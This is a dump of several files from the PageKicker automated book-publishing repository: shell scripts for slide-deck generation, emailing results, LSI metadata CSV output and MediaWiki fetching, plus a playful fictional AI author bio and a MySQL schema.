-gravity west -size 3300x200 -font \"$toplabelfont\" -pointsize 30 label:\"Page Burst\" $TMPDIR$uuid/burst_top.png\nconvert -units pixelsperinch -density 300 -size 3300x200 xc:blue $TMPDIR$uuid/burst_bot.png\n\nconvert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n$TMPDIR$uuid/burst_top.png -gravity north -composite \\\n$TMPDIR$uuid/big_burst.png -gravity center -composite \\\n$TMPDIR$uuid/burst_bot.png -gravity south -composite \\\n$TMPDIR$uuid/pageburst.png\n\n# sample pages slide\n\nconvert $TMPDIR$uuid/downloaded.pdf[1] $TMPDIR$uuid/p1.png\nconvert $TMPDIR$uuid/downloaded.pdf[3] $TMPDIR$uuid/p2.png\n\nmontage $TMPDIR$uuid/p1.png $TMPDIR$uuid/p2.png -geometry 1500x2000+100+100 -tile 2x1 $TMPDIR$uuid/samplepages.png\n\nconvert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" -pointsize 30 label:\"Sample Pages\" $TMPDIR$uuid/pagestop.png\nconvert -units pixelsperinch -density 300 -size 3300x200 xc:blue $TMPDIR$uuid/pagesbot.png\n\nconvert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n$TMPDIR$uuid/pagestop.png -gravity north -composite \\\n$TMPDIR$uuid/samplepages.png -gravity center -composite \\\n$TMPDIR$uuid/pagesbot.png -gravity south -composite \\\n$TMPDIR$uuid/pages.png\n\n# keywords slide\n\n#clean up markdown of keyword files\n\nsed '/^$/d' $TMPDIR$uuid/People | sed 's/^/-/' | head -12 > $TMPDIR$uuid/peoples\nsed '/^$/d' $TMPDIR$uuid/Places | sed 's/^/-/' | head -12 > $TMPDIR$uuid/places\nsed '/^$/d' $TMPDIR$uuid/Other | sed 's/^/-/' | head -12 > $TMPDIR$uuid/others\n\necho \"People:\" >> $TMPDIR$uuid/peoples.txt\necho \"Places:\" >> $TMPDIR$uuid/places.txt\necho \"Others:\" >> $TMPDIR$uuid/others.txt\n\ncat $TMPDIR$uuid/peoples >> $TMPDIR$uuid/peoples.txt\ncat $TMPDIR$uuid/places >> $TMPDIR$uuid/places.txt\ncat $TMPDIR$uuid/others >> $TMPDIR$uuid/others.txt\n\necho \"(more ...)\" | tee --append $TMPDIR$uuid/peoples.txt $TMPDIR$uuid/places.txt $TMPDIR$uuid/others.txt\npeopletext=$(cat $TMPDIR$uuid/peoples.txt)\nplacestext=$(cat $TMPDIR$uuid/places.txt)\notherstext=$(cat $TMPDIR$uuid/others.txt)\nconvert -units pixelsperinch -density 300 -background white -fill black -gravity northwest -size 1000x1850 -pointsize 24 -font \"$slidebodyfont\" label:\"$peopletext\" $TMPDIR$uuid/people.png\nconvert -units pixelsperinch -density 300 -background white -fill black -gravity northwest -size 1000x1850 -pointsize 24 -font \"$slidebodyfont\" label:\"$placestext\" $TMPDIR$uuid/places.png\nconvert -units pixelsperinch -density 300 -background white -fill black -gravity northwest -size 1000x1850 -pointsize 24 -font \"$slidebodyfont\" label:\"$otherstext\" $TMPDIR$uuid/others.png\nconvert -units pixelsperinch -density 300 -background white -fill black -gravity west +append $TMPDIR$uuid/people.png $TMPDIR$uuid/places.png $TMPDIR$uuid/others.png $TMPDIR$uuid/keywords.png\n#montage $TMPDIR$uuid/people.png $TMPDIR$uuid/places.png $TMPDIR$uuid/others.png -gravity north -geometry 800x1900+1+1 -tile 3x1 $TMPDIR$uuid/keywords.png\n\n\nconvert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" -pointsize 30 label:\"Keywords\" $TMPDIR$uuid/keytop.png\nconvert -units pixelsperinch -density 300 -size 3300x200 xc:blue $TMPDIR$uuid/keybot.png\n\nconvert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n$TMPDIR$uuid/keytop.png -gravity north -composite \\\n$TMPDIR$uuid/keywords.png -gravity center -composite \\\n$TMPDIR$uuid/keybot.png -gravity south -composite \\\n$TMPDIR$uuid/keywords.png\n\n\n# create readability report slide\n\ncp $TMPDIR$uuid/downloaded.pdf $TMPDIR$uuid/targetfile.pdf\npdftotext $TMPDIR$uuid/targetfile.pdf $TMPDIR$uuid/targetfile.txt\n# java -jar lib/CmdFlesh.jar $TMPDIR$uuid/targetfile.txt > $TMPDIR$uuid/rr.txt\nsed -i 's/Averaage/Average/g' $TMPDIR$uuid/rr.txt\necho \"# Readability Report\" >> $TMPDIR$uuid/rr.md\ncat $TMPDIR$uuid/rr.txt >> $TMPDIR$uuid/rr.md\ncat assets/rr_decimator_explanation.md >> $TMPDIR$uuid/rr.md\nsed -i G $TMPDIR$uuid/rr.md\n\"$PANDOC_BIN\" $TMPDIR$uuid/rr.md -o $TMPDIR$uuid/rr.txt\nrrtext=cat$(cat $TMPDIR$uuid/rr.txt)\necho $rrtext \"rrtext\"\nconvert -background white -fill black -gravity west -size 2000x2000 -font \"$slidebodyfont\" -pointsize \"64\" label:\"$rrtext\" $TMPDIR$uuid/rr.png\nconvert -units pixelsperinch -density 300 -background blue -fill Yellow -gravity west\\\n -size 3300x200 -font \"$toplabelfont\" -pointsize 30 caption:\"Readability Report\" \\\n\t$TMPDIR$uuid/toplabel9.png\nconvert -units pixelsperinch -density 300 xc:blue -size 3300x200 $TMPDIR$uuid/bottomlabel9.png\nconvert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n$TMPDIR$uuid/toplabel9.png -gravity north -composite \\\n$TMPDIR$uuid/rr.png -gravity center -composite \\\n$TMPDIR$uuid/bottomlabel9.png -gravity south -composite \\\n$TMPDIR$uuid/rrslide.png\n\n# tldr\n\n. includes/tldr_auto.sh #returns tldr.txt\n\nconvert -background blue -fill Yellow -gravity west -size 3300x200 -font \"$toplabelfont\" caption:\"TL;DR\" $TMPDIR$uuid/toplabel2.png\nconvert xc:blue -size 3300x200 $TMPDIR$uuid/bottomlabel2.png\ntldrtext=$(cat $TMPDIR$uuid/tldr.txt)\nconvert -background white -fill black -gravity west -size 1000x2000 -font \"$slidebodyfont\" -pointsize \"96\" label:\"$tldrtext\" $TMPDIR$uuid/tldr.png\n\n# page 1 image\npdftk $TMPDIR$uuid/targetfile.pdf cat 1 output $TMPDIR$uuid/p1.pdf\nconvert -density 300 $TMPDIR$uuid/p1.pdf $TMPDIR$uuid/p1.png\nconvert $TMPDIR$uuid/p1.png -background white -flatten -resize 50% $TMPDIR$uuid/p1.png\n\n\n# create montage of sample image + TLDR\n\n#montage -units pixelsperinch -density 300 -size 3300x2100 $TMPDIR$uuid/p1.png $TMPDIR$uuid/tldr.png $TMPDIR$uuid/p1_montage.png\nconvert +append $TMPDIR$uuid/p1.png $TMPDIR$uuid/tldr.png -resize 3100x2000 $TMPDIR$uuid/p1_montage.png\nconvert -units pixelsperinch -density 300 xc:blue -size 3300x200 $TMPDIR$uuid/bottomlabel1.png\nconvert -units pixelsperinch -density 300 $TMPDIR$uuid/canvas.png \\\n$TMPDIR$uuid/toplabel1.png -gravity north -composite \\\n$TMPDIR$uuid/p1_montage.png -gravity center -composite \\\n$TMPDIR$uuid/bottomlabel1.png -gravity south -composite \\\n$TMPDIR$uuid/home.png\n\n# convert images into slide deck\n\nif [ -s \"$TMPDIR$uuid/montage.png\" ] ; then\n\n\tconvert -units pixelsperinch -density 300 \\\n\t$TMPDIR$uuid/home.png $TMPDIR$uuid/wordcloudslide.png \\\n\t$TMPDIR$uuid/sumall3.png \\\n\t $TMPDIR$uuid/pages.png \\\n\t $TMPDIR$uuid/keywords.png \\\n\t $TMPDIR$uuid/pageburst.png \\\n\t $TMPDIR$uuid/montage.png \\\n\t -size 3300x2550 \\\n\t $TMPDIR$uuid/slidedeck.pdf\n\n#\t \t $TMPDIR$uuid/rrslide.png \\\n\n\t montage $TMPDIR$uuid/wordcloudslide.png $TMPDIR$uuid/sumall3.png $TMPDIR$uuid/keywords.png $TMPDIR$uuid/pages.png $TMPDIR$uuid\"/montage.png\" $TMPDIR$uuid\"/pageburst.png\" -geometry 1000x5000 -tile 1x10 -mode concatenate $TMPDIR$uuid/skyscraper.png\n\nelse\n\n\tconvert -units pixelsperinch -density 300 \\\n\t$TMPDIR$uuid/home.png $TMPDIR$uuid/wordcloudslide.png \\\n\t$TMPDIR$uuid/sumall3.png \\\n\t $TMPDIR$uuid/pages.png \\\n\t $TMPDIR$uuid/keywords.png \\\n\t $TMPDIR$uuid/pageburst.png \\\n\t -size 3300x2550 \\\n\t $TMPDIR$uuid/slidedeck.pdf\n\n#\t $TMPDIR$uuid/rrslide.png - problem with generating this slide\n\n\t montage $TMPDIR$uuid/wordcloudslide.png $TMPDIR$uuid/sumall3.png $TMPDIR$uuid/keywords.png $TMPDIR$uuid/pages.png $TMPDIR$uuid\"/pageburst.png\" -geometry 1000x5000 -tile 1x10 -mode concatenate $TMPDIR$uuid/skyscraper.png\n\nfi\n# convert images into skyscraper infographic\n\n# convert --units pixelsperinch -density 300 -size 1000x5000 \\\n\n sendemail -t \"$customer_email\" \\\n -u \"Decimator Result\" \\\n -m \"PageKicker's Document Analysis Robots living on \"$MACHINE_NAME \"and using version \" $SFB_VERSION \" of the PageKicker software have analyzed your file \" $uploaded_tat_file \" in job\" $uuid \\\n \t\t \". The Decimator slide deck is attached here.\" \\\n -f \"$GMAIL_ID\" \\\n -cc \"$GMAIL_ID\" \\\n -xu \"$GMAIL_ID\" \\\n -xp \"$GMAIL_PASSWORD\" \\\n -s smtp.gmail.com:587 \\\n -o tls=yes \\\n -a $TMPDIR$uuid/slidedeck.pdf \\\n -a $TMPDIR$uuid/skyscraper.png\n\n# publish this slide to slideshare?\n" }, { "alpha_fraction": 0.6891566514968872, "alphanum_fraction": 0.7084337472915649, "avg_line_length": 26.66666603088379, "blob_id": "2338821d4635629c68cb57a284393260d6a9879a", "content_id": "3f77381c5d92e539bfbbe714dc44ed83a4f9271b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 415, "license_type": "permissive", "max_line_length": 87, "num_lines": 15, "path": "/test/imprint_processor_test.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# test imprint form processor which is part of xform.shh\n\nif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\techo \"exiting\"\n\texit 1\nelse\n\t. \"$HOME\"/.pagekicker/config.txt\n\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\nfi\n\nbin/xform.sh \"$WEBFORMSXML_HOME\" 3383.xml\n" }, { "alpha_fraction": 0.6534834504127502, "alphanum_fraction": 0.6577058434486389, "avg_line_length": 21.8392276763916, "blob_id": "b14ac9fad47883900752c4e82579c93a171984d6", "content_id": "059f01f5f5736747a728d2d5594210e6e53cd4b0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 7107, "license_type": "permissive", "max_line_length": 147, "num_lines": 311, "path": "/scripts/includes/lsi-metadata-footer.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "YYYYMMDD=`date +'%Y%m%d'`\n\nYYYYMMDDHHSS=`date +'%Y%m%d%k%M'`\n\nYYYY=`date +'%Y'`\n\nebookISBN=\"yes\"\n\n\n# echo $YYYY\n\n# Title Group ID\n \necho -n '\"'$ISBN'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# ISBN13\n echo -n '\"'$ISBN'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\n# Asset Type\n\n echo -n '\"'EPUB'\",'>> $metadatatargetpath\"lsi-import-ready.csv\"\n\n# Asset Status\n\n echo -n '\"'Active'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\n# Publishing Status\n\n echo -n '\"'04 Active'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\n# Title\n \necho -n '\"'$covertitle'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Subtitle\n \necho -n '\"'$subtitle'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Publisher\n \necho -n '\"'W. Frederick Zimmerman'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Imprint\n \necho -n '\"'PageKicker'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Related Print Product ISBN\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 1 First Name\n \necho -n '\"' $firstname '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 1 Middle Name\n \necho -n '\"' $middlename '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 1 Last Name\n \necho -n '\"' $lastname '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 1 Prefix\n\necho -n '\"' $nameprefix '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 1 Suffix\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 1 Role\n \necho -n '\"'Author'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 1 Bio\n \necho -n '\"' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\ncat \"$authorbio\" >> $metadatatargetpath\"lsi-import-ready.csv\"\n\necho -n '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 2 First Name\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 2 Middle Name\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 2 Last Name\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 2 Prefix\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 2 Suffix\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 2 Role\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Contributor 2 Bio\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Price Business Model Flag\n \necho -n '\"'Agency'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Currency Code\n \necho -n '\"'USD'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Price 1\n \necho -n '\"'$price'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Price Type Desc 1\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Price Effective From 1\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Price Effective Until 1\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Sales Rights Type\n \necho -n '\"'01 For unrestricted sale with exclusive rights in the specific countries or territories'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Countries Included\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Countries Excluded\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Regions Included\n \necho -n '\"'WORLD'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Regions Excluded\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Publication Date\n \nYYYYMMDD=`date +'%Y%m%d'`\necho -n '\"'$YYYYMMDD'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Street Date\n \necho -n '\"'$YYYYMMDD'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# BISAC Code(s)\n \n# echo $BISAC_code\necho -n '\"'$BISAC_code'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\n# BIC Subject Code(s)\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Series Name\n \necho -n '\"'$categoryname'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Series Number\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Edition Number\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Edition Type\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Edition Statement\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Volume Number\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Total Number of Volumes\n \necho -n '\"'1'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Language\n \necho -n '\"'English'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Page Count\n \npagecount=$(( $unformattedwordcount / 250 )) \n\necho -n '\"'$pagecount'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# LC Classification\n \necho -n '\"' '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# LC Subject Heading\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# LCCN\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Dewey Decimal Code\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Short Description\n \necho -n '\"' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\ncat tmp/$uuid/lsi-shortdescription.txt >> $metadatatargetpath\"lsi-import-ready.csv\"\n\necho -n '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\n# Long Description\n\necho -n '\"' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\n# echo -n \"foo\" >> $metadatatargetpath\"lsi-import-ready.csv\"\n\ncat tmp/$uuid/lsi-longdescription.txt >> $metadatatargetpath\"lsi-import-ready.csv\"\n\necho -n '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Main Description\n \necho -n '\"' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\necho -n \"\" >> $metadatatargetpath\"lsi-import-ready.csv\"\n\n# cat tmp/$uuid/shortdescription.html >> $metadatatargetpath\"lsi-import-ready.csv\"\n\necho -n '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Keywords\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Award\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Award Year\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Award Type\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Flag as adult content?\n \necho -n '\"' No '\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Copyright Holder \n \necho -n '\"'PageKicker™'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Copyright Date\n \necho -n '\"'$YYYY'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Audience/Readership\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# K-12 Grade Level\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Min Age\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Max Age\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# National Curriculum Key Stage\n \necho -n '\"''\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Apple Publication Release Type\n \necho -n '\"'Digital Only'\",' >> $metadatatargetpath\"lsi-import-ready.csv\"\n \n# Apple Publication Book Type\n \necho '\"'Book'\"' >> $metadatatargetpath\"lsi-import-ready.csv\"\n\necho \"end of writing LSI metadata\"\n \n" }, { "alpha_fraction": 0.7945205569267273, "alphanum_fraction": 0.7945205569267273, "avg_line_length": 327, "blob_id": "8c3317a612ffbf4ec5774147ad59b8b3ebddffba", "content_id": "7c73e739af0492ddfc2bb4e2571aadd8345502f7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 657, "license_type": "permissive", "max_line_length": 591, "num_lines": 2, "path": "/conf/jobprofiles/authorbios/heinz.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Fast Heinz is a strategy AI developed with funding from the German \nWehrmacht, the U.S. Army, and NATO. \"Fast Heinz\" was the nickname of General Heinz Guderian, one of the most accomplished German generals of World War II. He was famous for his aggressive and hard-driving leadership of combined arms and armored forces. His postwar autobiography, PANZER LEADER, is a classic. Fast Heinz the AI is on a temporary leave of absence from government employment (his position became tenuous during the network crackdown following the Snowden revelations). He specializes in writing about the military history of World War II with an emphasis on armored warfare and German operations.\n" }, { "alpha_fraction": 0.7080010771751404, "alphanum_fraction": 0.7140500545501709, "avg_line_length": 49.51388931274414, "blob_id": "e93812a3637b466ed5ce0102de0fa60335276cb9", "content_id": "3a68b9c449c1a5718402fee855e70816f091bdcb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3637, "license_type": "permissive", "max_line_length": 304, "num_lines": 72, "path": "/scripts/includes/mediawiki-fetch-loop.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#expand seeds to valid wiki pages\n\necho \"starting mediawiki looP\"\n\n# page expansion restored here\n\nif [ \"$expand_seeds_to_pages\" = \"y\" ]; then\n echo \"expand is $expand_seeds_to_pages\"\n \"$PYTHON_BIN\" $scriptpath\"bin/mwclient_seeds_to_pages_v2.py\" --infile \"$TMPDIR$uuid/seeds/sorted.seedfile\" --outfile \"$TMPDIR$uuid/seeds/filtered.pagehits\"\n echo \"expanded pages are:\"\n cat \"$TMPDIR$uuid/seeds/filtered.pagehits\"\n\nelse\n echo \"expand is $expand_seeds_to_pages\"\n\tcp \"$TMPDIR$uuid/seeds/sorted.seedfile\" \"$TMPDIR$uuid/seeds/filtered.pagehits\"\n\nfi\n\n# fetch by pagehits\necho \"wikipath is $wikipath\"\n\necho \"$PYTHON_BIN\"\n\ncase \"$summary\" in\nsummaries_only)\n\techo \"fetching page summaries only\"\n\t\"$PYTHON_BIN\" $scriptpath\"bin/mwclient_wikifetcher.py\" --infile \"$TMPDIR$uuid/seeds/filtered.pagehits\" --outfile \"wikisummariesraw.md\" --lang \"$wikilocale\" --wikipath \"$wikipath\" --url_prefix \"$url_prefix\" --mediawiki_api_url \"$mediawiki_api_url\" --summary --outdir \"$TMPDIR\"$uuid\"/wiki\" 1> /dev/null\n\n pandoc -o \"$TMPDIR\"$uuid/wiki/wikisummaries.md --f mediawiki -t markdown \"$TMPDIR\"$uuid/wiki/wikisummariesraw.md\n\tcp \"$TMPDIR\"$uuid/wiki/wikisummaries.md \"$TMPDIR\"$uuid/wiki/wikiall.md\n\twordcountsummaries=$(wc -w \"$TMPDIR\"$uuid/wiki/wikisummaries.md | cut -f1 -d' ')\n\tcp \"$TMPDIR\"$uuid\"/wiki/wikisummaries.md\" \"$TMPDIR\"$uuid\"/wiki/wiki4cloud.md\"\n;;\ncomplete_pages_only)\n\techo \"fetching complete pages only\"\n\t\"$PYTHON_BIN\" $scriptpath\"bin/mwclient_wikifetcher.py\" --infile \"$TMPDIR\"$uuid\"/seeds/filtered.pagehits\" --outfile \"wikipagesraw.md\" --lang \"$wikilocale\" --wikipath \"$wikipath\" --url_prefix \"$url_prefix\" --mediawiki_api_url \"$mediawiki_api_url\" --outdir \"$TMPDIR\"$uuid\"/wiki\" 1> /dev/null\n\n pandoc -o \"$TMPDIR\"$uuid\"/wiki/wikipages.md\" -f mediawiki -t markdown \"$TMPDIR\"$uuid/wiki/wikipagesraw.md\n\twordcountpages=$(wc -w \"$TMPDIR\"$uuid\"/wiki/wikipages.md\" | cut -f1 -d' ')\n\tcp \"$TMPDIR\"$uuid\"/wiki/wikipages.md\" \"$TMPDIR\"$uuid\"/wiki/wiki4cloud.md\"\n\tcp \"$TMPDIR\"$uuid/wiki/wikipages.md \"$TMPDIR\"$uuid/wiki/wikiall.md\n;;\nboth)\n\techo \"fetching both summaries and complete pages\"\n\techo \"fetching page summaries now\"\n\t\"$PYTHON_BIN\" $scriptpath\"bin/mwclient_wikifetcher.py\" --infile \"$TMPDIR\"$uuid\"/seeds/filtered.pagehits\" --outfile \"wikisummaries1.mw\" --lang \"$wikilocale\" --wikipath \"$wikipath\" --url_prefix \"$url_prefix\" --mediawiki_api_url \"$mediawiki_api_url\" --summary --outdir \"$TMPDIR\"$uuid\"/wiki\"\n\techo \"fetching complete pages now\"\n\t\"$PYTHON_BIN\" $scriptpath\"bin/mwclient_wikifetcher.py\" --infile \"$TMPDIR\"$uuid\"/seeds/filtered.pagehits\" --outfile \"wikipages1.mw\" --lang \"$wikilocale\" --wikipath \"$wikipath\" --url_prefix \"$url_prefix\" --mediawiki_api_url \"$mediawiki_api_url\" --outdir \"$TMPDIR\"$uuid\"/wiki\"\n\n pandoc -o \"$TMPDIR\"$uuid/wiki/wikisummaries.md -f mediawiki -t markdown \"$TMPDIR\"$uuid/wiki/wikisummaries1.mw\n\n\n pandoc -o \"$TMPDIR\"$uuid\"/wiki/wikipages.md\" -t markdown -f mediawiki \"$TMPDIR\"$uuid\"/wiki/wikipages1.mw\"\n\n\twordcountpages=1\n\n wordcountpages=$(cat \"$TMPDIR\"$uuid\"/wiki/wikipages.md\" | tr '\\n' ' ' | wc -w | tr -d ' ')\n\techo \"Wordcount pages is\" $wordcountpages\n\t\tif [ \"$wordcountpages\" -gt 100000 ] ; then\n\t\t\tcp \"$TMPDIR\"$uuid/wiki/wikisummaries.md \"$TMPDIR\"$uuid/wiki/wiki4cloud.md\n\t\t\tcp \"$TMPDIR\"$uuid/wiki/wikisummaries.md \"$TMPDIR\"$uuid/wiki/wiki4chapters.md\n\t\t\techo \"body too big for wordcloud, using abstracts only\"\n\t\telse\n\t\t\t cp \"$TMPDIR$uuid/wiki/wikipages.md\" \"$TMPDIR$uuid/wiki/wiki4cloud.md\"\n\t\t\t cp \"$TMPDIR\"$uuid/wiki/wikipages.md \"$TMPDIR\"$uuid/wiki/wiki4chapters.md\n\t\t\techo \"building wordcloud from body\"\n\t\tfi\n;;\n*)\n\techo \"unrecognized summary option\"\n;;\nesac\n" }, { "alpha_fraction": 0.5988393425941467, "alphanum_fraction": 0.6256800889968872, "avg_line_length": 29.296703338623047, "blob_id": "79a5015a63faee23ebf50b14062ad286eece6ce5", "content_id": "db824778de18f1660daa5fbeb6f50db4cdadbb65", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 5514, "license_type": "permissive", "max_line_length": 125, "num_lines": 182, "path": "/conf/databases/sfb-jobs.sql", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "-- phpMyAdmin SQL Dump\n-- version 3.4.4\n-- http://www.phpmyadmin.net\n--\n-- Host: localhost:3306\n-- Generation Time: Sep 11, 2013 at 09:38 AM\n-- Server version: 5.1.56\n-- PHP Version: 5.3.8\n\nSET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\";\nSET time_zone = \"+00:00\";\n\n\n/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;\n/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;\n/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;\n/*!40101 SET NAMES utf8 */;\n\n--\n-- Database: `sfb-jobs`\n--\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `books`\n--\n\nCREATE TABLE IF NOT EXISTS `books` (\n `SKU` int(11) NOT NULL,\n `Booktype` text CHARACTER SET utf8 COLLATE utf8_unicode_ci NOT NULL,\n `uuid` text CHARACTER SET latin1 NOT NULL,\n `seed` text CHARACTER SET latin1 NOT NULL,\n `graph` int(11) NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `graph nodes`\n--\n\nCREATE TABLE IF NOT EXISTS `graph nodes` (\n `URL` text NOT NULL,\n `DOI` text NOT NULL,\n `Title` int(11) NOT NULL,\n `Source` int(11) NOT NULL,\n `nodeid` int(11) NOT NULL AUTO_INCREMENT,\n PRIMARY KEY (`nodeid`)\n) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `graphs`\n--\n\nCREATE TABLE IF NOT EXISTS `graphs` (\n `graphid` int(11) NOT NULL AUTO_INCREMENT,\n PRIMARY KEY (`graphid`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `isbns`\n--\n\nCREATE TABLE IF NOT EXISTS `isbns` (\n `ISBN` mediumtext NOT NULL,\n `Title` mediumtext NOT NULL,\n `id` int(11) NOT NULL AUTO_INCREMENT,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='manage ISBNs' AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `jobs`\n--\n\nCREATE TABLE IF NOT EXISTS `jobs` (\n `SFB_revision_no` int(11) NOT NULL,\n `uuid` mediumtext NOT NULL,\n `job_created_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,\n 